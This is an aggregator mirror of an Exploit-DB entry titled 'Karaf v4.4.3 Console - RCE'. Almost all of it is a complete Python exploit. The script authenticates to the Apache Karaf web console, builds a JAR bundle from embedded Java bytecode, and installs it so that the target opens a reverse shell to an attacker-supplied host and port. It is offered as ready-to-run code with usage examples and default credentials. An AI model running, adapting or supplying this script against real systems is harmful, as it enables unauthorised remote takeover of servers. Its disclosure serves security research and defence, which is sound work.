2

[webapps] Karaf v4.4.3 Console - RCE

 1 month ago
source link: https://www.exploit-db.com/exploits/51895
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Karaf v4.4.3 Console - RCE

EDB-ID:

51895

EDB Verified:

Platform:

Java

Date:

2024-03-16

Vulnerable App:

#!/usr/bin/python

# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#           [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
#                   --lhost=192.168.0.100 --lport=4444 \
#                   --creds=karaf:karaf


"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests

# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
    "Bundle-Name: RevShell\n" \
    "Bundle-Description: Bundle openning a reverse shell connection.\n" \
    "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
    "Bundle-Vendor: VisionSpace\n" \
    "Bundle-Version: 1.0.0\n" \
    "Import-Package: org.osgi.framework\n" \
    "Bundle-Activator: com.visionspace.osgi.revshell.Activator"

# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
    b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
    b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
    b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
    b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
    b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
    b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
    b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
    b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
    b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
    b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
    b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
    b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
    b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
    b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
    b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
    b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
    b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
    b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
    b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
    b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
    b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
    b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
    b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
    b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
    b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
    b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
    b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
    b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
    b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
    b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
    b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
    b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
    b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
    b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
    b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
    b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
    b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
    b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
    b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
    b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
    b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
    b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
    b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
    b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
    b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
    b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
    b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
    b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
    b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
    b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
    b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
    b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
    b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
    b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
    b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
    b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
    b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
    b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
    b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
    b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
    b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
    b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
    b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
    b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
    b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
    b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
    b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
    b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
    b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
    b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
    b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
    b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
    b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
    b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
    b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
    b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
    b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
    b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
    b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
    b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
    b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
    b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
    b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
    b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
    b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
    b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
    b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
    b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
    b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
    b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
    b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
    b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
    b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
    b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
    b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
    b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
    b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
    b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
    b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
    b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
    b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
    b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
    b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
    b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
    b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
    b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
    b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
    b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
    b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
    b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
    b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
    b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
    b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
    b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
    b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
    b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
    b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
    b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
    b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
    b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
    b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
    b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
    b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
    b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
    b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
    b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
    b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
    b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
    b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
    b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
    b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
    b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
    b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
    b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
    b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
    b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
    b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
    b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
    b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
    b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
    b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
    b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
    b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
    b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
    b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
    b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
    b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
    b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
    b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
    b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
    b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
    b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
    b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
    b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
    b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
    b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
    b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
    b"\x32"

# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"


def parse():
    """
    This function parses the command-line arguments.
    """

    parser = argparse.ArgumentParser(
        prog="Karaf-Console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running Karaf Console",
        epilog="Happy Hacking! :)",
    )

    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=True)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=True)
    parser.add_argument("--creds", dest="creds",
                        help="credentials in format <username:password>",
                        type=str, required=True)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    return parser.parse_args()


def extract_jsessionid(cookie):
    """
    This function extracts the JSESSIONID from the cookie string.
    """

    jsessionid = None

    regex = re.findall("JSESSIONID=([^;]+)", cookie)
    if len(regex) > 0:
        jsessionid = regex[0]

    return jsessionid


def authenticate(target, basic_auth):
    """
    This function connects to the URL and retrieves the JSESSIONID
    based on the Basic Authorization.
    """

    jsessionid = None

    headers = {
        "Authorization": basic_auth
    }

    response = requests.get(target, headers=headers,
                            allow_redirects=False, timeout=10)

    if (response.status_code == 302 and response.headers["Set-Cookie"]):
        jsessionid = extract_jsessionid(response.headers["Set-Cookie"])

    return jsessionid


def generate_payload(lhost, lport):
    """
    This function generates the payload.
    It replaces the template payload with the `lhost` and `lport` arguments.
    """

    payload = None

    lhost_byte_array = bytearray()
    lhost_byte_array.append(len(lhost))
    lhost_byte_array.extend(map(ord, lhost))

    activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
        ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)

    lport_str = str(lport)
    lport_byte_array = bytearray()
    lport_byte_array.append(len(lport_str))
    lport_byte_array.extend(map(ord, lport_str))

    activator_class_bytecodes = activator_class_bytecodes.replace(
        ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)

    jar_bytes = io.BytesIO()

    with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
                          activator_class_bytecodes)
        zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)

    payload = jar_bytes.getvalue()

    return payload


def deploy_payload(target, basic_auth, jsessionid, payload):
    """
    This function connects to the Karaf Console and deployes the payload.
    """

    success = False

    url = f"{target}/bundles"

    cookies = {
        "JSESSIONID": jsessionid
    }

    headers = {
        "Authorization": basic_auth
    }

    files = {
        "bundlefile": (
            "revshell.jar", payload, "application/x-java-archive")
    }

    data = {
        "action": "install",
        "bundlestart": "start",
        "bundlestartlevel": 80
    }

    response = requests.post(url, headers=headers, cookies=cookies,
                             files=files, data=data, timeout=10,
                             allow_redirects=False)

    if response.status_code == 302:
        success = True

    return success


def generate_basic_auth(creds):
    """
    This function generates the Basic Authorization string based
    on the credentials.
    """

    creds_base64 = base64.b64encode(creds.encode()).decode()
    basic_auth = f"Basic {creds_base64}"

    return basic_auth


def create_target_url(rhost, rport):
    """
    This function creates a target URL.
    """

    target_url = f"http://{rhost}:{rport}/system/console"

    return target_url


def main(args):
    """
    Main function.
    """

    target = create_target_url(args.rhost, args.rport)

    print("[*] Login...")
    basic_auth = generate_basic_auth(args.creds)
    jsessionid = authenticate(target, basic_auth)

    if jsessionid:
        print("[+] Session established.")

        print("[*] Generating payload...")
        payload = generate_payload(args.lhost, args.lport)

        if payload:
            print("[*] Deploying payload...")
            if deploy_payload(target, basic_auth, jsessionid, payload):
                print("[+] Done.")
            else:
                print("[-] Failed to deploy the payload!")
        else:
            print("[-] Failed to generate the payload!")
    else:
        print("[-] Login failed!")


if __name__ == "__main__":
    main(parse())

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK